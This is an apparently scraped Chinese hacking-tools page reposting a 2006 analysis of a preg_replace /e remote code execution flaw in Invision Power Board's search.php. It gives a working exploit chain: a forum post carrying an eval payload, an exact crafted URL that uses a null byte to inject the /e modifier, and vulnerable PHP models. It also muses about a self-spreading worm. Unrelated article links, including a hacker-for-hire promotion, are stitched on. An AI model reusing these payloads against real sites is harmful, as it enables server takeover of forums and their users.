微信聊天记录被清空了怎么查?一键查询微信聊天

访客3年前黑客工具1130

ipb search.php 漏洞分析及思考Author:SuperHei_[At]_ph4nt0m.orgBlog:http://superhei.blogbus.com/Team:http://www.ph4nt0m.orgData: 2006-04-27###############简单分析################该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php行1258-1262:if ( $this->ipsclass->input['lastdate'] ){$this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );}}通过变量input['lastdate']注入/e, $this->output注入shellcode。###############利用 *** ################注册一个用户,发个贴 内容[shellcode]如下:[superheixxxxxxxeval(phpinf0()); //注意最后的;和//之间有一空格然后点“Search”--->Search by Keywords:superheixxxxxxxeval [记得选择Show results as posts ]可以得到searchidhttp://127.0.0.1/ipb215/upload/index.php?act=Search&CODE=show&searchid=81a5a928d500c4653647e5b249ab5f53&search_in=posts&result_type=posts&highlite=superheixxxxxxxeval然后在后面加一个&lastdate=z|eval.*?%20//)%23e%00 也就是[/e]提交就ok了:http://127.0.0.1/ipb215/upload/index.php?act=Search&CODE=show&searchid=81a5a928d500c4653647e5b249ab5f53&search_in=posts&result_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?%20//)%23e%00###############分析讨论################1. 简单分析:该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php行1258-1262:if ( $this->ipsclass->input['lastdate'] ){$this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );}}通过变量input['lastdate']注入/e, $this->output注入shellcode。这个分析,掉了一个重要的细节:preg_replace+/e 里有3个参数,只有第2个参数里的代码才可以执行,但是上面的语句貌似是第3个参数提交的,其实不然,注意上面preg_replace里的第2个参数:\\1 selected='selected' 里面的\\1 为之一参数里正则表达试匹配后的值。归根结底我们提交的shellcode还是在第2个参数执行了。2. 注意最后的;和//之间有一空格这个又是为什么呢?因为我们提交的lastdate=z|eval.*?%20//)%23e%00里是已空格+//为标志的,所以我们提交的shellcode也要有空格+//3.preg_replace存在null截断漏洞????我想这个应该算是php本身一个的漏洞[同以前include的null截断漏洞],我们测试下,把上面的漏洞写个简单的模型:<?$a=$_GET[a];echo preg_replace("#(value=[\"']z|eval.*?//)#e{$a}[\"'])#i ","\\1 ","heigegegxxxxxxxeval(phpinfo());//");?>我们直接提交http://127.0.0.1/test2.php?a=2出现错误:Warning: Unknown modifier '2' in d:\easyphp\www\test2.php on line 3提交http://127.0.0.1/test2.php?a=%002 则执行phpinfo(). 我们成功截断了。模型代码执行环境要求gpc=off ,但是在很多的web程序里是经过变量编码和解码在执行的,所以不受gpc的影响,上面的ipb的就可以在gpc=on的情况下截断。4."lastdate=z|eval.*?%20//)%23e%00"的构造主要是在this->output里以eval和%20//为标志取\\1 为执行的php代码。5.worm的利用?还记得Santy吗?就是利用的phpbb里的一个preg_replace,这里会会被利用呢?ipb这个漏洞的利用必须要登陆,但是在ipb注册时候有“图片认证”,不过据说这个可以编写程序读出来?? 只要突破这个worm是有可能的,毕竟ipb的用户有那么多......###############总结模型################1.直接在preg_replace第2个变量执行的模式:<?echo preg_replace("/test/e",$h,"jutst test");?>提交http://127.0.0.1/test/11/preg.php?h=phpinfo()实例如:phpbb的viewtopic.php变量$highliht_match提交php代码执行漏洞2.通过\\1[或者\\n]提取第3个变量里的php代码并执行的模式:<?echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $h);?>提交:http://127.0.0.1/test/11/preg.php?h=[php]phpinfo()[/php]参考:r57的exp:http://www.milw0rm.com/exploits/1720更多资料:http://www.google.com

相关文章

科谱|挑选数据库审计的三个原因

科谱|挑选数据库审计的三个原因

黑格尔曾说:“存在即是合理。” 在安华金和来看,这句话放进数据安全行业一样可用。 据相关数据调查报告,超出90%的数据信息是以数据库泄露而出的。正是如此,服务器安全产品对完成关键数据信息的安全...

狗狗怎样训练见效快(训练狗狗没有进展怎么办

狗狗怎样训练见效快(训练狗狗没有进展怎么办

很多时候我们我们训练狗狗总是得不到成效,并不是因为狗狗太笨,而是我们的训练方法可能存在一定的误区。因此假如我们训练多时却得不到进展,那么最好先从我们自身开始找原因,当然也不要明知不可为而为之,对于一些...

酷狗音乐2020年度数专盘点出炉 周杰伦林俊杰肖战

坎坷但闪光的2020年,你经历了怎样的音乐之旅?这两天,酷狗音乐重磅发布2020数字专辑年度盘点,带领网友们重新回顾2020年的乐坛风云。 这一年,467张数字专辑陆续上线酷...

黑客是怎么让你的QQ发信息的(如何让成为一名黑客)-1入侵手机的黑客软件苹果版

黑客是怎么让你的QQ发信息的(如何让成为一名黑客)-1入侵手机的黑客软件苹果版

黑客是怎么让你的QQ发信息的(如何让成为一名黑客)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网...

我和小伙伴惊呆了(我的小伙伴都惊呆了)

  本月的iPhone8和iPhoneX又一次将苹果带入了人们的视线。转眼十年过去了。自从2007年乔布斯发布了第一部iPhone,就有一个经典的机型不能忘记。它是乔布斯发布的最后一部iPhone(第...